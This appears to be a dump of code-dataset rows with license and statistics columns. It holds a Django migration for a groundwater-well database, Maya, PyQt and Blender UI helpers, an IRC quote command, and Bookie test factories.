),
migrations.AddField(
model_name='drillingcompany',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='drillingcompany',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='drillingcompany',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='drillingcompany',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='drillingmethod',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='drillingmethod',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='drillingmethod',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='drillingmethod',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='groundelevationmethod',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='groundelevationmethod',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='groundelevationmethod',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='groundelevationmethod',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='intendedwateruse',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='intendedwateruse',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='intendedwateruse',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='intendedwateruse',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='landdistrict',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='landdistrict',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='landdistrict',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='landdistrict',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologycolour',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologycolour',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologycolour',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologycolour',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologydescription',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologydescription',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologydescription',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologydescription',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologyhardness',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologyhardness',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologyhardness',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologyhardness',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologymoisture',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologymoisture',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologymoisture',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologymoisture',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologystructure',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologystructure',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologystructure',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologystructure',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologyweathering',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologyweathering',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologyweathering',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologyweathering',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='ltsaowner',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='ltsaowner',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='ltsaowner',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='ltsaowner',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='provincestate',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='provincestate',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='provincestate',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='provincestate',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='surficialmaterial',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='surficialmaterial',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='surficialmaterial',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='surficialmaterial',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='well',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='well',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='well',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='well',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellactivitytype',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellactivitytype',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellactivitytype',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellactivitytype',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellclass',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellclass',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellclass',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellclass',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellsubclass',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellsubclass',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellsubclass',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellsubclass',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellyieldunit',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellyieldunit',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellyieldunit',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellyieldunit',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AlterField(
model_name='activitysubmission',
name='drilling_method',
field=models.ForeignKey(db_column='drilling_method_guid', null=True, on_delete=django.db.models.deletion.CASCADE, to='gwells.DrillingMethod', verbose_name='Drilling Method'),
),
migrations.AlterField(
model_name='activitysubmission',
name='latitude',
field=models.DecimalField(decimal_places=6, max_digits=8, null=True),
),
migrations.AlterField(
model_name='activitysubmission',
name='longitude',
field=models.DecimalField(decimal_places=6, max_digits=9, null=True),
),
migrations.AlterField(
model_name='lithologydescription',
name='lithology_from',
field=models.DecimalField(decimal_places=2, max_digits=7, validators=[django.core.validators.MinValueValidator(Decimal('0.00'))], verbose_name='From'),
),
migrations.AlterField(
model_name='lithologydescription',
name='lithology_to',
field=models.DecimalField(decimal_places=2, max_digits=7, validators=[django.core.validators.MinValueValidator(Decimal('0.01'))], verbose_name='To'),
),
]
| apache-2.0 | -280,287,383,028,197,200 | 34.45913 | 186 | 0.548286 | false | 4.581798 | false | false | false |
dsparrow27/zoocore | zoo/libs/command/commandui.py | 1 | 2760 | from functools import partial
from qt import QtWidgets, QtGui, QtCore
from zoo.libs import iconlib
from zoo.libs.utils import zlogging
logger = zlogging.getLogger(__name__)
class CommandActionBase(QtCore.QObject):
"""CommandUi class deals with encapsulating a command as a widget
"""
triggered = QtCore.Signal(str)
triggeredUi = QtCore.Signal(str)
def __init__(self, command):
super(CommandActionBase, self).__init__()
self.command = command
self.item = None
def create(self, parent=None):
pass
class MenuItem(CommandActionBase):
def create(self, parent=None, optionBox=False):
from maya import cmds
uiData = self.command.uiData
self.item = cmds.menuItem(label=uiData["label"], boldFont=uiData.get("bold", False), parent=parent,
italicized=uiData.get("italicized", False), command=self.emitCommand,
optionBox=optionBox)
if optionBox:
cmds.menuItem(parent=parent, optionBox=optionBox, command=self.emitCommandUi)
return self.item
def emitCommand(self, *args):
"""
:param args: dummy to deal with maya command args shit stains. basically useless
:type args: tuple
"""
self.triggered.emit(self.command.id)
def emitCommandUi(self, *args):
"""
:param args: dummy to deal with maya command args shit stains. basically useless
:type args: tuple
"""
self.triggeredUi.emit(self.command.id)
class CommandAction(CommandActionBase):
def create(self, parent=None):
uiData = self.command.uiData
self.item = QtWidgets.QWidgetAction(parent)
text = uiData.get("label", "NOLABEL")
actionLabel = QtWidgets.QLabel(text)
self.item.setDefaultWidget(actionLabel)
color = uiData.get("color", "")
backColor = uiData.get("backgroundColor", "")
if color or backColor:
actionLabel.setStyleSheet(
"QLabel {background-color: %s; color: %s;}" % (backColor,
color))
icon = uiData.get("icon")
if icon:
if isinstance(icon, QtGui.QIcon):
self.item.setIcon(icon)
else:
icon = iconlib.icon(icon)
if not icon.isNull():
self.item.setIcon(icon)
self.item.setStatusTip(uiData.get("tooltip"))
self.item.triggered.connect(partial(self.triggered.emit, self.command.id))
logger.debug("Added commandAction, {}".format(text))
return self.item
def show(self):
if self.item is not None:
self.item.show()
| gpl-3.0 | -7,807,650,875,466,042,000 | 33.5 | 107 | 0.598913 | false | 4.119403 | false | false | false |
Microvellum/Fluid-Designer | win64-vc/2.78/Python/bin/2.78/scripts/addons/io_blend_utils/bl_utils/subprocess_helper.py | 1 | 5646 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
"""
Defines an operator mix-in to use for non-blocking command line access.
"""
class SubprocessHelper:
"""
Mix-in class for operators to run commands in a non-blocking way.
This uses a modal operator to manage an external process.
Subclass must define:
``command``:
List of arguments to pass to subprocess.Popen
report_interval: Time in seconds between updating reports.
``process_pre()``:
Callback that runs before the process executes.
``process_post(returncode)``:
Callback that runs when the process has ende.
returncode is -1 if the process was terminated.
Subclass may define:
``environment``:
Dict of environment variables exposed to the subprocess.
Contrary to the subprocess.Popen(env=...) parameter, this
dict is and not used to replace the existing environment
entirely, but is just used to update it.
"""
environ = {}
command = ()
@staticmethod
def _non_blocking_readlines(f, chunk=64):
"""
Iterate over lines, yielding b'' when nothings left
or when new data is not yet available.
"""
import os
from .pipe_non_blocking import (
pipe_non_blocking_set,
pipe_non_blocking_is_error_blocking,
PortableBlockingIOError,
)
fd = f.fileno()
pipe_non_blocking_set(fd)
blocks = []
while True:
try:
data = os.read(fd, chunk)
if not data:
# case were reading finishes with no trailing newline
yield b''.join(blocks)
blocks.clear()
except PortableBlockingIOError as ex:
if not pipe_non_blocking_is_error_blocking(ex):
raise ex
yield b''
continue
while True:
n = data.find(b'\n')
if n == -1:
break
yield b''.join(blocks) + data[:n + 1]
data = data[n + 1:]
blocks.clear()
blocks.append(data)
def _report_output(self):
stdout_line_iter, stderr_line_iter = self._buffer_iter
for line_iter, report_type in (
(stdout_line_iter, {'INFO'}),
(stderr_line_iter, {'WARNING'})
):
while True:
line = next(line_iter).rstrip() # rstrip all, to include \r on windows
if not line:
break
self.report(report_type, line.decode(encoding='utf-8', errors='surrogateescape'))
def _wm_enter(self, context):
wm = context.window_manager
window = context.window
self._timer = wm.event_timer_add(self.report_interval, window)
window.cursor_set('WAIT')
def _wm_exit(self, context):
wm = context.window_manager
window = context.window
wm.event_timer_remove(self._timer)
window.cursor_set('DEFAULT')
def process_pre(self):
pass
def process_post(self, returncode):
pass
def modal(self, context, event):
wm = context.window_manager
p = self._process
if event.type == 'ESC':
self.cancel(context)
self.report({'INFO'}, "Operation aborted by user")
return {'CANCELLED'}
elif event.type == 'TIMER':
if p.poll() is not None:
self._report_output()
self._wm_exit(context)
self.process_post(p.returncode)
return {'FINISHED'}
self._report_output()
return {'PASS_THROUGH'}
def execute(self, context):
import subprocess
import os
import copy
self.process_pre()
env = copy.deepcopy(os.environ)
env.update(self.environ)
try:
p = subprocess.Popen(
self.command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
)
except FileNotFoundError as ex:
# Command not found
self.report({'ERROR'}, str(ex))
return {'CANCELLED'}
self._process = p
self._buffer_iter = (
iter(self._non_blocking_readlines(p.stdout)),
iter(self._non_blocking_readlines(p.stderr)),
)
wm = context.window_manager
wm.modal_handler_add(self)
self._wm_enter(context)
return {'RUNNING_MODAL'}
def cancel(self, context):
self._wm_exit(context)
self._process.kill()
self.process_post(-1)
| gpl-3.0 | -5,265,626,018,868,350,000 | 28.873016 | 97 | 0.553135 | false | 4.491647 | false | false | false |
tetra5/radiance | ui/widgets/verticallabel.py | 1 | 1370 | # -*- coding: utf-8 -*-
"""
Created on 28.01.2011
@author: vda
"""
from PyQt4 import QtCore, QtGui
class VerticalLabel(QtGui.QWidget):
def __init__(self, text, parent=None):
QtGui.QLabel.__init__(self, parent)
self.text = text
fm = QtGui.QApplication.fontMetrics()
self.width = fm.width(self.text)
self.height = fm.height()
# self.setMinimumSize(QtCore.QSize(100, 100))
# self.setMaximumSize(QtCore.QSize(100, 100))
# self.setGeometry(0, 0, 100, 100)
self.setMinimumSize(QtCore.QSize(self.width, self.height))
self.setMaximumSize(QtCore.QSize(self.width, self.height))
self.setGeometry(0, 0, self.width, self.height)
# self.update()
def paintEvent(self, event):
fm = QtGui.QApplication.fontMetrics()
painter = QtGui.QPainter()
painter.begin(self)
painter.setBrush(QtGui.QBrush(QtGui.QColor('#CCCCCC')))
painter.setPen(QtCore.Qt.NoPen)
painter.drawRect(0, 0, fm.height(), fm.width(self.text))
#painter.drawRect(0, 0, 100, 100)
painter.setPen(QtCore.Qt.black)
# painter.translate(20, 100)
painter.rotate(-90)
painter.drawText(event.rect(), QtCore.Qt.AlignCenter, self.text)
painter.end()
| mit | 5,865,820,515,146,894,000 | 26.42 | 72 | 0.586861 | false | 3.586387 | false | false | false |
supermaik/selbot | Quote_Command.py | 1 | 1175 | from Quotes import Quote
from Command import Command
class Quote_Command(Command):
def __init__(self, config):
self.connection = config['connection']
self.event = config['event']
self.channel = config['channel']
pass
def resolve(self):
args = self.event.arguments[0].split()
# Don't let people skip last 10 (for voting!)
if not self.channel.quote_last_ten:
#Check if they asked for a source
if len(args) > 1:
try:
#Grab a random quote from given source
q = self.channel.quotes_list.random_quote(args[1])
except Exception:
#Invalid source name
q = Quote("your_boss", "Don't you think you should be getting back to work?")
else:
#Grab random quote from random source
q = self.channel.quotes_list.random_quote()
self.channel.last_quote = q
#Print the quote
self.respond(self.event.target, q)
pass
def respond(self, target, message):
self.connection.privmsg(target, message)
| unlicense | 5,750,818,820,420,012,000 | 34.606061 | 97 | 0.556596 | false | 4.450758 | false | false | false |
ojengwa/Bookie | bookie/tests/factory.py | 1 | 2651 | """Provide tools for generating objects for testing purposes."""
from datetime import datetime
from random import randint
import random
import string
from bookie.models import DBSession
from bookie.models import Bmark
from bookie.models import Tag
from bookie.models.applog import AppLog
from bookie.models.auth import User
from bookie.models.stats import (
StatBookmark,
USER_CT,
)
def random_int(max=1000):
"""Generate a random integer value
:param max: Maximum value to hit.
"""
return randint(0, max)
def random_string(length=None):
"""Generates a random string from urandom.
:param length: Specify the number of chars in the generated string.
"""
chars = string.ascii_uppercase + string.digits
str_length = length if length is not None else random_int()
return unicode(u''.join(random.choice(chars) for x in range(str_length)))
def random_url():
"""Generate a random url that is totally bogus."""
url = u"http://{0}.com".format(random_string())
return url
def make_applog(message=None, status=None):
"""Generate applog instances."""
if status is None:
status = random_int(max=3)
if message is None:
message = random_string(100)
alog = AppLog(**{
'user': random_string(10),
'component': random_string(10),
'status': status,
'message': message,
'payload': u'',
})
return alog
def make_tag(name=None):
if not name:
name = random_string(255)
return Tag(name)
def make_bookmark(user=None):
"""Generate a fake bookmark for testing use."""
bmark = Bmark(random_url(),
username=u"admin",
desc=random_string(),
ext=random_string(),
tags=u"bookmarks")
if user:
bmark.username = user.username
bmark.user = user
DBSession.add(bmark)
DBSession.flush()
return bmark
def make_user_bookmark_count(username, data, tstamp=None):
"""Generate a fake user bookmark count for testing use"""
if tstamp is None:
tstamp = datetime.utcnow()
bmark_count = StatBookmark(tstamp=tstamp,
attrib=USER_CT.format(username),
data=data)
DBSession.add(bmark_count)
DBSession.flush()
return [bmark_count.attrib, bmark_count.data, bmark_count.tstamp]
def make_user(username=None):
"""Generate a fake user to test against."""
user = User()
if not username:
username = random_string(10)
user.username = username
DBSession.add(user)
DBSession.flush()
return user
| agpl-3.0 | 812,322,954,075,319,000 | 23.775701 | 77 | 0.632214 | false | 3.875731 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.